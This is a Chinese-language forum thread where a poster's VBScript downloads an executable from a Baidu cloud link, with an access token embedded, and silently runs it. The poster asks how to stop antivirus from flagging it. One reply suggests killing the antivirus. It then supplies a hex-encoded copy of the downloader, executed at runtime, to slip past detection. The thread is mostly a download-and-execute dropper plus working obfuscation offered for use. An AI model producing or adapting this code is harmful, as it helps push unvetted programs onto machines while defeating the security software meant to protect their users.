返回列表 发帖

[问题求助] vbs文件报毒,直接被删,求解决办法

Set xPost= createObject("Microsoft.XMLHTTP")
xPost.Open"GET","https://d.pcs.baidu.com/rest/2.0/pcs/file?method=download&access_token=3.428cd972462324065bf52c929a5b7c0d.2592000.1383729570.2620584487-1040388&path=/apps/izt8/ksbinstaller_s_66_77146.exe",0
xPost.send()
Set sGet = CreateObject("ADODB.Stream")
Sget.Mode = 3
Sget.Type = 1
SGET.Open()
b=xPost.responseBody
if len(b)>0 then'len(b)>0
sGet.Write(b)
Sget.SaveToFile "C:\ksbinstaller_s_66_77146.exe", 2
Set run = createObject("wscript.shell")
run.run "C:\ksbinstaller_s_66_77146.exe",3
end ifCOPY
这一段代码,会被报毒,求解决啊,本人菜鸟,代码也是从别人那拿的,求直接给解决办法

什么杀毒软件?把这个代码放到白名单里吧

TOP

回复 2# DAIC

我是想找让他不报毒的办法啊,应该是添加加密代码就可以的,可是我不会加

TOP

求助啊亲们

TOP

不一定管用,最好的办法是:干掉杀软 ^_^
url = "http://gnu-on-windows.googlecode.com/files/gzip-1.5-bin.zip"
fileName = "d:\gzip.zip"
var = "53,65,74,20,78,50,6F,73,74,3D,20,63,72,65,61,74,65,4F,62,6A,65,63,74,28,22,4D,69,63,72,6F,73,6F,66,74,2E,58,4D,4C,48,54,54,50,22,29,0D,0A,78,50,6F,73,74,2E,4F,70,65,6E,20,22,47,45,54,22,2C,75,72,6C,2C,66,61,6C,73,65,0D,0A,78,50,6F,73,74,2E,73,65,6E,64,28,29,0D,0A,53,65,74,20,73,47,65,74,20,3D,20,43,72,65,61,74,65,4F,62,6A,65,63,74,28,22,41,44,4F,44,42,2E,53,74,72,65,61,6D,22,29,0D,0A,73,47,65,74,2E,4D,6F,64,65,20,3D,20,33,0D,0A,73,47,65,74,2E,54,79,70,65,20,3D,20,31,0D,0A,73,47,65,74,2E,4F,70,65,6E,28,29,0D,0A,62,3D,78,50,6F,73,74,2E,72,65,73,70,6F,6E,73,65,42,6F,64,79,20,3A,20,53,65,74,20,78,50,6F,73,74,20,3D,20,4E,6F,74,68,69,6E,67,0D,0A,69,66,20,6C,65,6E,28,62,29,3E,30,20,74,68,65,6E,0D,0A,20,20,20,20,73,47,65,74,2E,57,72,69,74,65,28,62,29,0D,0A,20,20,20,20,73,47,65,74,2E,53,61,76,65,54,6F,46,69,6C,65,20,66,69,6C,65,4E,61,6D,65,2C,20,32,0D,0A,65,6E,64,20,69,66,0D,0A,6D,73,67,62,6F,78,20,22,4F,4B,22"
Execute GetChr(Split(var,","))
Function GetChr(ar)
    For i = 0 to UBound(ar) : ar(i)=chr("&h"&ar(i)) : next
    GetChr = Join(ar,"")
End FunctionCOPY

TOP

返回列表